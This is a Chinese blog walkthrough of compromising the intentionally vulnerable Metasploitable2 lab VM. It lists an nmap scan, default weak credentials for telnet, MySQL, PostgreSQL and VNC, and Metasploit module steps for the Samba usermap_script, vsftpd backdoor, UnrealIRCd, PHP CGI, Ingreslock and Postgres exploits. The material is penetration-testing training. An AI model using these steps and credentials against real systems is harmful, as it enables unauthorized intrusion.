Metasploitable2 靶机详细漏洞介绍及通关

最新推荐文章于 2024-06-11 23:27:16 发布
最新推荐文章于 2024-06-11 23:27:16 发布
阅读量4.1k 收藏 36
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vilice/article/details/126721553
版权

测试前准备

使用ifconfig命令,在虚拟机获取Metasploitable2的IP地址

 在kali 使用ping命令,ping 10.0.0.112 尝试连接靶机。

Nmap - 端口扫描神器

简单介绍:

Nmap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。

作用

  1. 探测网路上存活的主机
  2. 探测主机开放的端口
  3. 探测相应端口的服务或软件和版本
  4. 探测操作系统,硬件地址,和软件版本
  5. 探测脆弱性漏洞(用自带的或者自己编译的脚本检测漏洞)

在进行漏洞测试前扫描靶机端口:使用nmap工具,命令为nmap -p 0-65535 10.0.0.112

注:-p为端口扫描命令,0-65535为计算机端口号(计算机总共有65536个端口),10.0.0.112为IP地址。

 注:rhosts为远程端口,lhost为本地端口

1.弱命令漏洞

系统弱密码

telnet 10.0.0.112 账号密码都为msfadmin

 

Mysql弱密码

使用mysql -h 10.0.0.112-u root 直接登录成功

 

PostgresQL弱密码

使用psql -h 10.0.0.112 -U postgres
密码:postgres 登录成功

 

VNC远程登录弱密码

使用vnciewer 10.0.0.112

密码password直接登录

 

2.Samba MS-RPC Shell命令注入漏洞

漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。

(1)在kali中启用msfconsole

 (2)搜索相对应的samba漏洞代码 search samba

 

(3)使用exploit/multi/samba/usermap_script

use exploit/multi/samba/usermap_script

(4)设置参数set rhosts 10.0.0.112

(5)执行命令,查看目录

run  
ls

 

3、Vsftpd源码包含后门漏洞

漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码

(1)在kali中启用msfconsole

 (2)搜索关于Vsftpd相关的漏洞库

search vsftpd

 

(3)使用exploit/unix/ftp/vsftpd_234_backdoor

use exploit/unix/ftp/vsftpd_234_backdoor

 

(4)设置参数set rhosts10.0.0.112

4.UnreallRCd后门漏洞

漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码

(1)找到相对应的模块进行使用

 (2)设置相对应的参数并执行

 

 

5.PHP CGI 参数注入执行漏洞

漏洞介绍:GI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

(1)找到相对应的模块进行使用

 (2)设置相对应的参数

 (3)执行

 

6、Ingreslock后门漏洞

漏洞介绍:Ingreslock 后门程序监听在1524端口,连接到1524端口就可以直接获得root权限

(1)执行telnet命令,直接获取权限

 

7、Postgres共享库代码任意执行

漏洞介绍:在一些默认的Linux安装的PostgreSQL,postgres服务账户可以写到/tmp目录,还有共享库,允许任意执行代码

(1)找到相对应的模块进行使用

 

(2)验证漏洞(可省略)

show options //显示信息

 (3)设置参数并执行

 

 

v1lice
关注
  • 3
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploitable2在VMware上的安装与初步渗透学习
m0_62623551的博客
10-08 2385
Metasploitable2是一个故意易受攻击的Linux虚拟机。该虚拟机可用于进行安全培训、测试安全工具和实践常见的渗透测试技术。
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
Metasploitable2安装基础----搭建DVWA
weixin_55205599的博客
06-07 1736
最近发现Metasploitable2靶机,可以直接用DVWA,不用自己用phpstudy搭建环境了(都怪我之前不知道这个靶机,本地搭建DVWA老不成功,其实是包下载的问题)注意:下载下来是zip,解压后用VMware打开;下载下来是VMware的,直接用VMWare打开Metasploitable.vmx文件即可。Metasploitable系统的默认账号密码:msfadmin;命令:sudo passwd root。注:0/24是固定的 24什么含义?密码:password。命令:su root。
Metaspoitable2安全测试靶机の测试心得(上)
最新发布
web_kids的博客
06-11 847
无聊写的
1-4metasploitable2介绍
山兔的博客
06-23 1242
metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware、virtualbox和其它虚拟平台。默认只开启一个网络适配器并且开启NAT和host-only,本镜像一定不要暴露在一个易受攻击的网络中。因为它本身包含很多漏洞,很容易被人进行攻击利用下载metasploitable2镜像文件iso。下载链接:https://sourceforge.net/p
Metasploitable2 漏洞评估(应该没人比我写得更详细更全了)
gh0stf1re的博客
09-17 5729
Metasploitable2 漏洞评估 深感自己基础不扎实,所以打算好好再练一下,就再日一遍Metasploitable2吧 前情提要 靶机Metasploitable2)ip:192.168.206.216 攻击机(kali)ip:192.168.206.128 端口扫描 root@kali:~/Desktop/tools# nmap -sV -p 1-65535 192.168.206.216 扫描结果如下 PORT STATE SERVICE VERSION 21/tcp
Metasploit Framework(MSF)对Metasploitable2的渗透解析
黄乔国PHP
05-15 919
Metasploitable2虚拟系统是一个特殊的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最核心是可以用来作为MSF攻击用的靶机。这样方便我们学习MSF框架的使用。并且开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了相关Web漏洞演练平台,如:TWiki,phpMyAdmin。
Metasploitable2 靶机漏洞(上)
Fly_鹏程万里
05-02 7319
此次演示环境 1、靶机Metasploitable2-Linux IP:192.168.160.131 2、攻击演示系统 Kali Linux 1.0.9 一、弱密码漏洞(Weak Password) 安全组织索引 CVE: OSVDB: BID: 原理: 系统或者数据库的登录用户,密码简单或者用户名与密码相同,容易通过暴...
metasploitable2,3漏洞加固
虚心学习,脚踏实地
05-03 1654
metasploitable2,3攻击及加固
Metasploit(2) 渗透测试之信息收集
weixin_41182861的博客
07-23 656
基于 TCP 协议收集主机信息 基于 SNMP 协议收集主机信息 基于 SMB 协议收集信息 基于 SSH 协议收集信息 基于 FTP 协议收集信息
Metasploitable2靶机漏洞_hanxu.doc
09-28
Metasploitable2靶机漏洞_hanxu.doc
Metasploitable3靶机
05-09
Metasploitable3是一个win2008的靶机---...Metasploitable正对Metasploitable2改变了很多,里面很多漏洞都是需要自己挖掘的,可以更适应现在社会上的模拟让网安更容易学习 让网安人员更好的磨练自己的技能
Metasploitable2-Linux.zip_believable
01-08
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。此文件是虚拟机镜像文件,可以直接在虚拟系统兼容的VMware,VirtualBox,和其他虚拟平台打开使用。默认只...
靶机无法自己获取ip地址解决办法
qq_44005305的博客
08-07 247
点击重启机器,在重启时不断的按键盘上的向上的方向键,调出启动菜单(可能要尝试很多次)按e进入内核加载的配置行将其修改为单用户模式修改前修改后按住ctrl+x进入单用户模式输入ip a,查看当前网卡信息我这里是/etc/network/interfaces进入之后提示我ifipdown已经被netplan(5)代替了,让我去/etc/netplan下找配置文件发现网卡名称不正确,修改为正确的就行重启计算机正常进入系统。重启计算机正常进入系统。
Metasploitable2靶机渗透笔记
qq_60600840的博客
07-20 766
metaspolitable靶机、安全、渗透、靶机
Metasploitable2使用指南
热门推荐
张同光 (Tongguang Zhang):Hello everyone !
04-22 1万+
http://www.freebuf.com/articles/system/34571.html Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,
常见的端口漏洞
子曰小玖的博客
05-13 2672
https://blog.csdn.net/Fly_hps/article/details/85037179
知道别人的端口,如何看出端口有什么漏洞
luyaran的博客
09-01 3730
常被黑客利用端口  一些端口常常会被黑客利用,还会被一些木马病毒利用,对计算机系统进行攻击,以下是计算机端口介绍以及防止被黑客攻击的简要办法。  8080端口  端口说明:8080端口同80端口,是被用于WWW代理服务的,可以实现网页浏览,经常在访问某个网站或使用代理服务器的时候,会加上“:8080”端口号,比如http://www.cce.com.cn:8080。  端口漏洞:8080端口可以
Metasploitable2 靶机漏洞
05-21
Metasploitable2是一款特意设计用于安全培训和漏洞评估的虚拟机,它包含了多个漏洞,可用于测试和学习渗透测试技术。以下是Metasploitable2中包含的一些常见漏洞: 1. Samba漏洞:该漏洞存在于Samba的可共享文件夹中,攻击者可以利用该漏洞执行任意代码并获取系统访问权限。 2. Apache漏洞Metasploitable2中的Apache服务器存在多个漏洞,可用于执行远程代码,包括一个可以导致缓冲区溢出的漏洞。 3. MySQL漏洞Metasploitable2中的MySQL服务器存在可被利用的漏洞,可以导致数据库注入攻击,从而使攻击者能够访问敏感数据。 4. FTP漏洞Metasploitable2中的FTP服务器存在许多漏洞,其中包括一个可以导致拒绝服务攻击的漏洞和一个可以导致远程代码执行的漏洞。 5. SSH漏洞Metasploitable2中的SSH服务器存在一个漏洞,可以导致拒绝服务攻击和远程代码执行。 需要注意的是,Metasploitable2是一个专门设计用于学习和测试渗透测试技术的虚拟机,不应该用于非法用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值